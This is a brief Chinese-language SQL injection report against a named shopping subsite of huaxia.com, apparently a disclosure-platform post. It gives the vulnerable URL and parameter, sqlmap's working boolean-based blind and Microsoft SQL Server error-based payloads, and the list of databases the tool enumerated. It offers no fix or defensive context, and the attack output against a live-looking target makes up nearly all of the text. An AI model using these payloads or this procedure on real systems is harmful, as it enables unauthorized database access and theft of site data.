华夏网某分站SQL注入
http://shop.huaxia.com/ldflist.aspx?city=%E4%B8%8A%E6%B5%B7&channelId=1
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: city
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: city=%E4%B8%8A%E6%B5%B7%' AND 4605=4605 AND '%'='&channelId=1
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: city=%E4%B8%8A%E6%B5%B7%' AND 1953=CONVERT(INT,(SELECT CHAR(113)+CH
AR(109)+CHAR(100)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (1953=1953) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(110)+CHAR(105)+CHAR(113))) AND '
%'='&channelId=1
---
available databases [9]:
[*] dbshop
[*] dongyi4
[*] master
[*] model
[*] msdb
[*] Northwind
[*] others
[*] pubs
[*] tempdb